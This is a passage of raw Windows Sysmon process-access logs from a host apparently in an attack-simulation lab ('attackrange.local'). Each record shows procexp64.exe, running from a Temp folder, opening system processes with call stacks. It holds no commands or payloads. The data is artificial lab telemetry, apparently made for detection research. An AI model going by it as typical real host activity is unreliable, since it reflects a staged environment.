Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784632Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784631Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784630Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784629Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784628Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784627Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784626Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784625Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784624Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784623Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784622Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784621Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784620Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784619Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784618Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784617Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784616Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784615Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 